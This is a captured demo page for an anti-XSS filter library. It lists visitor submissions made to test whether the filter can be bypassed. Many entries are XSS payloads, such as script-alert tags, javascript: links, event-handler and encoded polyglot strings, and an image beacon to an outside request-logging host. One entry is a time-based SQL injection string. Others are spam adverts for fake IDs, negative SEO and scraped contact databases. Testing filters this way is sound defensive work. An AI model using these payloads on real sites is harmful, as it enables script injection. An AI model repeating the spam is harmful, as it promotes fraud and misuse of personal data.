Anti-XSS for PHP

{ @hacker | "try to bypass this XSS filter" }

github.com/voku/anti-xss



If you need some inspiration for new attacks, take a look at the PHPUnit tests. I have already included test from e.g. "DOMPurify", "JS-XSS" and "LaravelSecurity". Here you can find some more XSS strings:



PS: This demo, is also available at github.com and you can also create pull-requests, here.

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

{% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}

result with twig: {{ xss.xss | escape }}:

{% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}

keyword(s):

description: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}

by hi | at 2021-03-05 18:02:53

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

eqwrwerwer;;--+ --

result with twig: {{ xss.xss | escape }}:

eqwrwerwer;;--+ -- <script>

keyword(s): <script

description:

by hello | at 2021-03-04 22:16:47

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

hello, {{ 1234 }}, my name is

result with twig: {{ xss.xss | escape }}:

hello, {{ 1234 }}, my name is

keyword(s):

description: adwad

by Bla | at 2021-02-28 10:38:20

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

SendBulkMails.com allows you to reach out to clients via cold email marketing. - 1Mil emails starter package - Dedicated IP and Domain Included - Detailed statistical reports (delivery, bounce, clicks etc.) - Quick and easy setup with extended support at no extra cost. - Cancel anytime! SendBulkMails.com

result with twig: {{ xss.xss | escape }}:

SendBulkMails.com allows you to reach out to clients via cold email marketing. - 1Mil emails starter package - Dedicated IP and Domain Included - Detailed statistical reports (delivery, bounce, clicks etc.) - Quick and easy setup with extended support at no extra cost. - Cancel anytime! SendBulkMails.com

keyword(s):

description: SendBulkMails.com allows you to reach out to clients via cold email marketing. - 1Mil emails starter package - Dedicated IP and Domain Included - Detailed statistical reports (delivery, bounce, clicks etc.) - Quick and easy setup with extended support at no extra cost. - Cancel anytime! SendBulkMails.com

by SendBulkMails.com | at 2021-02-26 13:57:10

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

</SCRIPT>alert(`SDA`)</SCRIPT>

keyword(s): test

description: test

by tes | at 2021-02-26 03:55:22

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

</SCRIPT>alert(`SDA`)</SCRIPT>

keyword(s):

description:

by Yan | at 2021-02-25 19:59:57

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hi, We'd like to introduce to you our explainer video service which we feel can benefit your site suckup.de. Check out some of our existing videos here: https://www.youtube.com/watch?v=oYoUQjxvhA0 https://www.youtube.com/watch?v=MOnhn77TgDE https://www.youtube.com/watch?v=NKY4a3hvmUc All of our videos are in a similar animated format as the above examples and we have voice over artists with US/UK/Australian accents. We can also produce voice overs in languages other than English. They can show a solution to a problem or simply promote one of your products or services. They are concise, can be uploaded to video such as Youtube, and can be embedded into your website or featured on landing pages. Our prices are as follows depending on video length: 0-1 minutes = $189 1-2 minutes = $339 2-3 minutes = $449 *All prices above are in USD and include a custom video, full script and a voice-over. If this is something you would like to discuss further, don't hesitate to get in touch. Kind Regards, Steve

result with twig: {{ xss.xss | escape }}:

Hi, We'd like to introduce to you our explainer video service which we feel can benefit your site suckup.de. Check out some of our existing videos here: https://www.youtube.com/watch?v=oYoUQjxvhA0 https://www.youtube.com/watch?v=MOnhn77TgDE https://www.youtube.com/watch?v=NKY4a3hvmUc All of our videos are in a similar animated format as the above examples and we have voice over artists with US/UK/Australian accents. We can also produce voice overs in languages other than English. They can show a solution to a problem or simply promote one of your products or services. They are concise, can be uploaded to video such as Youtube, and can be embedded into your website or featured on landing pages. Our prices are as follows depending on video length: 0-1 minutes = $189 1-2 minutes = $339 2-3 minutes = $449 *All prices above are in USD and include a custom video, full script and a voice-over. If this is something you would like to discuss further, don't hesitate to get in touch. Kind Regards, Steve

keyword(s):

description: We'd like to introduce to you our explainer video service which we feel can benefit your site suckup.de. Check out some of our existing videos here: https://www.youtube.com/watch?v=ivTmAwuli14 https://www.youtube.com/watch?v=uywKJQvfeAM https://www.youtube.com/watch?v=oPNdmMo40pI https://www.youtube.com/watch?v=6gRb-HPo_ck All of our videos are in a similar animated format as the above examples and we have voice over artists with US/UK/Australian accents. We can also produce voice overs in languages other than English. They can show a solution to a problem or simply promote one of your products or services. They are concise, can be uploaded to video such as Youtube, and can be embedded into your website or featured on landing pages. Our prices are as follows depending on video length: 0-1 minutes = $189 1-2 minutes = $339 2-3 minutes = $449 *All prices above are in USD and include a custom video, full script and a voice-over. If this is something you would like to discuss further, don't hesitate to get in touch. If you are not interested, simply delete this message and we won't contact you again. Kind Regards, Steve

by Steve James | at 2021-02-24 17:28:27

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Do you need more clients? We have amazing databases starting at $9.99 until the end of the Month! Visit us at StarDataGroup.com

result with twig: {{ xss.xss | escape }}:

Do you need more clients? We have amazing databases starting at $9.99 until the end of the Month! Visit us at StarDataGroup.com

keyword(s):

description: Do you need more clients? We have amazing databases starting at $9.99 until the end of the Month! Visit us at StarDataGroup.com

by Oliver Mcduffie | at 2021-02-24 13:22:31

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

>

result with twig: {{ xss.xss | escape }}:

>

keyword(s): ertre

description: erter

by ret | at 2021-02-23 22:49:04

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(1)</script>

keyword(s): bbb

description: ccc

by aaa | at 2021-02-23 16:36:28

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

{% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}

result with twig: {{ xss.xss | escape }}:

{% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}

keyword(s):

description:

by me | at 2021-02-22 20:10:26

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

sdasda

result with twig: {{ xss.xss | escape }}:

sdasda

keyword(s): adas

description: dasda

by assad | at 2021-02-20 04:19:49

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

">

result with twig: {{ xss.xss | escape }}:

"><script>alert(1);</script>

keyword(s): ">

description: ">

by "> | at 2021-02-20 04:19:26

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

#/*-/*`/*\`/*'/*"/**/(/* */=alert() )// //</stYle/</titLe/</teXtarEa/\x3csVg/<sVg/>\x3e

result with twig: {{ xss.xss | escape }}:

#jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

keyword(s): test

description: testing

by saad | at 2021-02-18 09:37:26

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

">

result with twig: {{ xss.xss | escape }}:

"><script>alert(1);</script>

keyword(s): test

description: testin

by saad | at 2021-02-18 09:36:54

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<img src="https://hookbin.com/yDXGGM2WaQfJNNPaRXj7">

keyword(s): asdasd

description: asdasdasd

by asdasdasd | at 2021-02-16 18:17:03

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

test

result with twig: {{ xss.xss | escape }}:

test

keyword(s): asdasd

description: test

by asdasdasd | at 2021-02-16 18:16:38

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Use SendBulkMails.com to run email campaigns from your own private dashboard. Cold emails are allowed and won't get you blocked :) - 1Mil emails / mo @ $99 USD - Dedicated IP and Domain Included - Detailed statistical reports (delivery, bounce, clicks etc.) - Quick and easy setup with extended support at no extra cost. - Cancel anytime! Regards, www.SendBulkMails.com

result with twig: {{ xss.xss | escape }}:

Use SendBulkMails.com to run email campaigns from your own private dashboard. Cold emails are allowed and won't get you blocked :) - 1Mil emails / mo @ $99 USD - Dedicated IP and Domain Included - Detailed statistical reports (delivery, bounce, clicks etc.) - Quick and easy setup with extended support at no extra cost. - Cancel anytime! Regards, www.SendBulkMails.com

keyword(s):

description: Use SendBulkMails.com to run email campaigns from your own private dashboard. Cold emails are allowed and won't get you blocked :) - 1Mil emails / mo @ $99 USD - Dedicated IP and Domain Included - Detailed statistical reports (delivery, bounce, clicks etc.) - Quick and easy setup with extended support at no extra cost. - Cancel anytime! Regards, www.SendBulkMails.com

by Dick Saucedo | at 2021-02-16 09:43:28

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hello If you ever need Negative SEO work, we offer it right here https://speed-seo.net/product/negative-seo-service/ thank you Peter Preiss Speed SEO Agency support@speed-seo.net

result with twig: {{ xss.xss | escape }}:

Hello If you ever need Negative SEO work, we offer it right here https://speed-seo.net/product/negative-seo-service/ thank you Peter Preiss Speed SEO Agency support@speed-seo.net

keyword(s):

description: Greetings If you ever need Negative SEO work, we offer it right here https://speed-seo.net/product/negative-seo-service/ thank you Peter Preiss Speed SEO Agency support@speed-seo.net

by Marylyn Preiss | at 2021-02-15 18:16:00

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

testins pace

result with twig: {{ xss.xss | escape }}:

<script>alert('testing')</script> testins pace

keyword(s):

description:

by je | at 2021-02-15 15:09:38

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert('testing')</script>

keyword(s):

description: testing

by tes | at 2021-02-15 15:08:59

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

drop table xx;//

result with twig: {{ xss.xss | escape }}:

drop table xx;//

keyword(s): <html></html>

description:

by Ahmed's | at 2021-02-14 14:25:05

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Test contentu '"> XSS

result with twig: {{ xss.xss | escape }}:

Test contentu '"><script>alert(1);</script> XSS

keyword(s):

description:

by ja | at 2021-02-12 11:15:35

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

hello hi {{ 4*4 }} bye

result with twig: {{ xss.xss | escape }}:

hello hi {{ 4*4 }} bye

keyword(s):

description: testing doublecurly for vue template injection

by dtk | at 2021-02-12 08:38:54

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

The best fake id maker in the market for over 15 years read our reviews and testimonials https://www.trustpilot.com/review/idgod.ch https://scamadviser.com/check-website/idgod.ch https://www.sitejabber.com/online-business-review?url=idgod.ch

result with twig: {{ xss.xss | escape }}:

The best fake id maker in the market for over 15 years read our reviews and testimonials https://www.trustpilot.com/review/idgod.ch https://scamadviser.com/check-website/idgod.ch https://www.sitejabber.com/online-business-review?url=idgod.ch

keyword(s):

description: The best fake id maker in the market for over 15 years read our reviews and testimonials https://www.trustpilot.com/review/idgod.ch https://scamadviser.com/check-website/idgod.ch https://www.sitejabber.com/online-business-review?url=idgod.ch

by Ted Ochs | at 2021-02-12 08:14:42

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

It is with sad regret to inform you StarDataGroup.com is shutting down. Fire sale going on! Any group of databases listed below is $49 or $149 for all 16 databases in this one time offer. You can purchase it at www.StarDataGroup.com and view samples. - LinkedIn Database 43,535,433 LinkedIn Records - USA B2B Companies Database 28,147,835 Companies - Forex Forex South Africa 113,550 Forex Traders Forex Australia 135,696 Forex Traders Forex UK 779,674 Forex Traders - UK Companies Database 521,303 Companies - German Databases German Companies Database: 2,209,191 Companies German Executives Database: 985,048 Executives - Australian Companies Database 1,806,596 Companies - UAE Companies Database 950,652 Companies - Affiliate Marketers Database 494,909 records - South African Databases B2B Companies Database: 1,462,227 Companies Directors Database: 758,834 Directors Healthcare Database: 376,599 Medical Professionals Wholesalers Database: 106,932 Wholesalers Real Estate Agent Database: 257,980 Estate Agents Forex South Africa: 113,550 Forex Traders Visit www.stardatagroup.com or contact us with any queries. Kind Regards, StarDataGroup.com

result with twig: {{ xss.xss | escape }}:

It is with sad regret to inform you StarDataGroup.com is shutting down. Fire sale going on! Any group of databases listed below is $49 or $149 for all 16 databases in this one time offer. You can purchase it at www.StarDataGroup.com and view samples. - LinkedIn Database 43,535,433 LinkedIn Records - USA B2B Companies Database 28,147,835 Companies - Forex Forex South Africa 113,550 Forex Traders Forex Australia 135,696 Forex Traders Forex UK 779,674 Forex Traders - UK Companies Database 521,303 Companies - German Databases German Companies Database: 2,209,191 Companies German Executives Database: 985,048 Executives - Australian Companies Database 1,806,596 Companies - UAE Companies Database 950,652 Companies - Affiliate Marketers Database 494,909 records - South African Databases B2B Companies Database: 1,462,227 Companies Directors Database: 758,834 Directors Healthcare Database: 376,599 Medical Professionals Wholesalers Database: 106,932 Wholesalers Real Estate Agent Database: 257,980 Estate Agents Forex South Africa: 113,550 Forex Traders Visit www.stardatagroup.com or contact us with any queries. Kind Regards, StarDataGroup.com

keyword(s):

description: It is with sad regret to inform you StarDataGroup.com is shutting down. Fire sale going on! Any group of databases listed below is $49 or $149 for all 16 databases in this one time offer. You can purchase it at www.StarDataGroup.com and view samples. - LinkedIn Database 43,535,433 LinkedIn Records - USA B2B Companies Database 28,147,835 Companies - Forex Forex South Africa 113,550 Forex Traders Forex Australia 135,696 Forex Traders Forex UK 779,674 Forex Traders - UK Companies Database 521,303 Companies - German Databases German Companies Database: 2,209,191 Companies German Executives Database: 985,048 Executives - Australian Companies Database 1,806,596 Companies - UAE Companies Database 950,652 Companies - Affiliate Marketers Database 494,909 records - South African Databases B2B Companies Database: 1,462,227 Companies Directors Database: 758,834 Directors Healthcare Database: 376,599 Medical Professionals Wholesalers Database: 106,932 Wholesalers Real Estate Agent Database: 257,980 Estate Agents Forex South Africa: 113,550 Forex Traders Visit www.stardatagroup.com or contact us with any queries. Kind Regards, StarDataGroup.com

by Arnulfo Mawby | at 2021-02-11 07:58:17

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

DIV

result with twig: {{ xss.xss | escape }}:

<div onmouseover='alert&lpar;1&rpar;'>DIV</div>

keyword(s): asdf

description: asdf

by asdf | at 2021-02-09 19:02:46

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<button>

result with twig: {{ xss.xss | escape }}:

<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>

keyword(s): asdf

description: asdf

by asd | at 2021-02-09 19:01:30

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

<body>foo bar</body>

result with twig: {{ xss.xss | escape }}:

<body>foo bar</body>

keyword(s): asd

description: asdf

by asdf | at 2021-02-09 19:00:12

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(1)</script>

keyword(s): adsf

description: script source

by asd | at 2021-02-09 18:59:14

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

;alert(String.fromCharCode( » 88,83,83))//\';alert(String. » fromCharCode(88,83,83))//";a » lert(String.fromCharCode(88, » 83,83))//\";alert(String.fro » mCharCode(88,83,83))//-->">'>=

result with twig: {{ xss.xss | escape }}:

;alert(String.fromCharCode( » 88,83,83))//\';alert(String. » fromCharCode(88,83,83))//";a » lert(String.fromCharCode(88, » 83,83))//\";alert(String.fro » mCharCode(88,83,83))//--></S » CRIPT>">'><SCRIPT>alert(Stri » ng.fromCharCode(88,83,83))</ » SCRIPT>=&{}

keyword(s): sampe 1

description: Sampe from htmlpurifier.org

by Joe Palladino | at 2021-02-09 18:56:07

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

John

result with twig: {{ xss.xss | escape }}:

John

keyword(s): dorkry

description: asdasdfa sdfas df asdflkasdj;lasdjal;ksdjf l;kajsd;lf jjas askldjf alskdjf ;lasjdf l;asku923 oiweuf

by Jayden Dork | at 2021-02-09 18:51:37

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

John 0') Mall&ey

result with twig: {{ xss.xss | escape }}:

John 0') Mall&ey

keyword(s): dorkry

description: asdasdfa sdfas df asdflkasdj;lasdjal;ksdjf l;kajsd;lf jjas askldjf alskdjf ;lasjdf l;asku923 oiweuf

by Jayden Dork | at 2021-02-09 18:50:11

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

John 0') Malley

result with twig: {{ xss.xss | escape }}:

John 0') Malley

keyword(s): dorkry

description: asdasdfa sdfas df asdflkasdj;lasdjal;ksdjf l;kajsd;lf jjas askldjf alskdjf ;lasjdf l;asku923 oiweuf

by Jayden Dork | at 2021-02-09 18:49:23

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

John 0'Malley

result with twig: {{ xss.xss | escape }}:

John 0'Malley

keyword(s): dorkry

description: asdasdfa sdfas df asdflkasdj;lasdjal;ksdjf l;kajsd;lf jjas askldjf alskdjf ;lasjdf l;asku923 oiweuf

by Jayden Dork | at 2021-02-09 18:48:35

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

www'.mymonkey.com.uk

result with twig: {{ xss.xss | escape }}:

www'.mymonkey.com.uk

keyword(s): asfd

description: asdf

by Joe Palladino | at 2021-02-09 18:45:16

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

www.google.com

result with twig: {{ xss.xss | escape }}:

www.google.com

keyword(s): Simple test

description: whatever you want this to be

by www.google.com | at 2021-02-09 18:43:42

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

/bbs/list.php?keyfield=contents&tn=notice&word=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z

result with twig: {{ xss.xss | escape }}:

/bbs/list.php?keyfield=contents&tn=notice&word=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z

keyword(s): sdf

description:

by ssdf | at 2021-02-06 17:54:53

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<TABLE » BACKGROUND="javascript:alert » ('XSS')"></TABLE>

keyword(s): sdg

description: lk

by sd | at 2021-02-04 17:47:44

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(1)</script>

keyword(s): sdg

description:

by sd | at 2021-02-04 17:45:36

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

g00dPa$$w0rD"=P4KB(92122)"

result with twig: {{ xss.xss | escape }}:

g00dPa$$w0rD"=P4KB(92122)"

keyword(s): g00dPa$$w0rD"=P4KB(92122)"

description: g00dPa$$w0rD"=P4KB(92122)"

by g00dPa$$w0rD"=P4KB(92122)" | at 2021-02-03 11:14:04

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

g00dPa$$w0rD"=P4KB(92122)"

result with twig: {{ xss.xss | escape }}:

g00dPa$$w0rD"onmouseover=P4KB(92122)"

keyword(s): g00dPa$$w0rD"=P4KB(92122)"

description: g00dPa$$w0rD"=P4KB(92122)"

by g00dPa$$w0rD"=P4KB(92122)" | at 2021-01-28 10:16:43

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

a

result with twig: {{ xss.xss | escape }}:

<b>a</b>

keyword(s):

description: test

by qqqq | at 2021-01-26 15:33:14

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(1)</script>

keyword(s): Yiy

description: Xx

by G | at 2021-01-25 18:39:07

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(1)</script>

keyword(s): 12312

description: 213

by 3123213 | at 2021-01-24 14:00:38

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(1)</script>

keyword(s): dfgdfg

description:

by fdg | at 2021-01-22 06:19:20

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(1)</script>

keyword(s):

description:

by fgdfgd | at 2021-01-20 18:45:07

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

XSS

result with twig: {{ xss.xss | escape }}:

XSS

keyword(s): Test

description: TESss

by Ponco | at 2021-01-19 08:38:32

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

sdfafafaf

result with twig: {{ xss.xss | escape }}:

sdfafafaf

keyword(s): d

description: dsa

by das | at 2021-01-19 07:34:19

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Happy New Year!!! www.google.com

result with twig: {{ xss.xss | escape }}:

Happy New Year!!! www.google.com

keyword(s):

description: Happy New Year!!! www.google.com

by Molley www.google.com | at 2021-01-17 02:26:49

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Greetings Finally there is a Google Optimized Service that has given proven results and that is backed by the customers! For more information, check our service here https://speed-seo.net/product/serp-booster/ thank you Peter Rowlandson Speed SEO Agency support@speed-seo.net

result with twig: {{ xss.xss | escape }}:

Greetings Finally there is a Google Optimized Service that has given proven results and that is backed by the customers! For more information, check our service here https://speed-seo.net/product/serp-booster/ thank you Peter Rowlandson Speed SEO Agency support@speed-seo.net

keyword(s):

description: Hi there Finally there is a Google Updates Free Service that has given proven results and that is backed by the customers! For more information, check our service here https://speed-seo.net/product/serp-booster/ thank you Peter Rowlandson Speed SEO Agency support@speed-seo.net

by Helena Rowlandson | at 2021-01-17 00:29:26

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Nessun problema, era giusto per regolarmi.

Martin darà il numero di Julian alla madre, dicendogli che dovrebbe avere un contatto diretto con il padre di Brittany per tutte le info necessarie. La ringrazierà infinite volte per aiutarlo a salvarla e che s'impegnerà per darle una mano in casa, il più possibile.

Per le date sento anche Brittany. Devo sentire anche altri?

Il dado : 

  21:21 Martin [TIRO SKILL] ha tirato 3d6 (13) su RICERCHE (14). Ottiene un Successo con scarto di 1

<form action="insChat()" id="inviox" name="inviox"> </form></div>

result with twig: {{ xss.xss | escape }}:

<div style="text-align: justify;">Nessun problema, era giusto per regolarmi.<br /><br />Martin dar&agrave; il numero di Julian alla madre, dicendogli che dovrebbe avere un contatto diretto con il padre di Brittany per tutte le info necessarie. La ringrazier&agrave; infinite volte per aiutarlo a salvarla e che s'impegner&agrave; per darle una mano in casa, il pi&ugrave; possibile.<br /><br />Per le date sento anche Brittany. Devo sentire anche altri?<br /><br />Il dado :&nbsp;<p id="ac_218376">&nbsp;&nbsp;21:21&nbsp;Martin&nbsp;[TIRO SKILL] ha tirato 3d6 (13) su RICERCHE (14).&nbsp;<i>Ottiene un Successo con scarto di 1</i></p><form action="javascript:insChat()" id="inviox" name="inviox">&nbsp;</form></div>

keyword(s):

description: test

by miky | at 2021-01-14 17:37:57

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<SCRIPT>alert('XSS');</SCRIPT>

keyword(s): kjhg

description: kjgh

by jh | at 2021-01-10 18:53:46

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

{% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}

result with twig: {{ xss.xss | escape }}:

{% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}

keyword(s): sdg

description: sdggsd

by sd | at 2021-01-09 19:49:13

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Xzgj vcx

result with twig: {{ xss.xss | escape }}:

Xzgj vcx

keyword(s): Koronawirus

description: Hddgjjvxxcbhh

by mc | at 2021-01-07 14:09:19

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

XSS

result with twig: {{ xss.xss | escape }}:

XSS

keyword(s): abc,efg

description: opis

by test | at 2021-01-04 11:58:13

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(1)</script>

keyword(s):

description:

by | at 2020-12-25 20:42:40

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<script>alert(1)</script>

keyword(s): das

description: dasa

by das | at 2020-12-23 20:54:54

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Doloremque velit asp

result with twig: {{ xss.xss | escape }}:

Doloremque velit asp

keyword(s): Adipisci consectetur

description: Vero minim occaecat

by Aut ullam eveniet e | at 2020-12-23 02:07:52

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

Hi there If you want to get ahead of your competition then you must have a higher Domain Authority score for your website. Its just as simple as that. With our service your suckup.de DA score will get above 50 points in just 30 days. This service is guaranteed For more information, check our service here https://speed-seo.net/product/moz-da50-seo-plan/ thank you Speed SEO Digital Team support@speed-seo.net

result with twig: {{ xss.xss | escape }}:

Hi there If you want to get ahead of your competition then you must have a higher Domain Authority score for your website. Its just as simple as that. With our service your suckup.de DA score will get above 50 points in just 30 days. This service is guaranteed For more information, check our service here https://speed-seo.net/product/moz-da50-seo-plan/ thank you Speed SEO Digital Team support@speed-seo.net

keyword(s):

description: Hi there If you want to get ahead of your competition then you must have a higher Domain Authority score for your website. Its just as simple as that. With our service your suckup.de DA score will get above 50 points in just 30 days. This service is guaranteed For more information, check our service here https://speed-seo.net/product/moz-da50-seo-plan/ thank you Speed SEO Digital Team support@speed-seo.net

by Ulrike Palazzi | at 2020-12-22 04:41:42

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

test

result with twig: {{ xss.xss | escape }}:

test

keyword(s): test

description: test

by test | at 2020-12-21 22:18:10

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

CLICK

result with twig: {{ xss.xss | escape }}:

<a href='&#x2000;javascript:alert(1)'>CLICK</a>

keyword(s):

description:

by CLICK | at 2020-12-21 07:54:11

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

CLICK

result with twig: {{ xss.xss | escape }}:

<a href='&#x2000;javascript:alert(1)'>CLICK</a>

keyword(s): asd

description: asd

by asd | at 2020-12-18 16:06:21

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

%3C%2Fscript%3E %3Cscript%3Efunction()%7bqxss%7d%3B%3C%2Fscript%3E

keyword(s): sa

description: as

by as | at 2020-12-16 13:49:34

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

gggg

result with twig: {{ xss.xss | escape }}:

gggg

keyword(s): ggg

description: ggg

by ggg | at 2020-12-16 08:46:45

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

gdfgd

result with twig: {{ xss.xss | escape }}:

gdfgd

keyword(s): CLICK

description: asdasda

by dasdasd | at 2020-12-14 18:05:28

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

CLICK

result with twig: {{ xss.xss | escape }}:

<a href='&#x2000;javascript:alert(1)'>CLICK</a>

keyword(s): A

description: Xss

by A | at 2020-12-13 20:31:12

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

a

result with twig: {{ xss.xss | escape }}:

a

keyword(s): a

description: a

by a | at 2020-12-10 14:35:28

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

CLICK

result with twig: {{ xss.xss | escape }}:

<a href='&#x2000;javascript:alert(1)'>CLICK</a>

keyword(s):

description:

by fef | at 2020-12-08 14:18:42

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

CLICK

result with twig: {{ xss.xss | escape }}:

<a href='&#x2000;javascript:alert(1)'>CLICK</a>

keyword(s): b

description: c

by a | at 2020-12-07 16:08:47

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

mantap

result with twig: {{ xss.xss | escape }}:

<wkwk>mantap</small>

keyword(s): <wkwk>mantap</small>

description: <wkwk>mantap</small>

by <wkwk>mantap</small> | at 2020-12-07 16:06:17

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

mantap

result with twig: {{ xss.xss | escape }}:

<wkwk>mantap</small>

keyword(s): <p></p>

description: asdasd

by <wkwk> | at 2020-12-07 16:05:35

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<SCRIPT>alert('XSS');</SCRIPT>

keyword(s):

description:

by fddfdf | at 2020-12-03 00:17:12

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<SCRIPT>alert('XSS');</SCRIPT>

keyword(s):

description:

by fsdf | at 2020-11-26 20:23:39

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

dfgf

result with twig: {{ xss.xss | escape }}:

dfgf

keyword(s):

description:

by gdf | at 2020-11-26 20:23:05

result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

result with twig: {{ xss.xss | escape }}:

<SCRIPT>alert('XSS');</SCRIPT>

keyword(s): DASDAS

description:

by DASDSA | at 2020-11-24 22:43:15

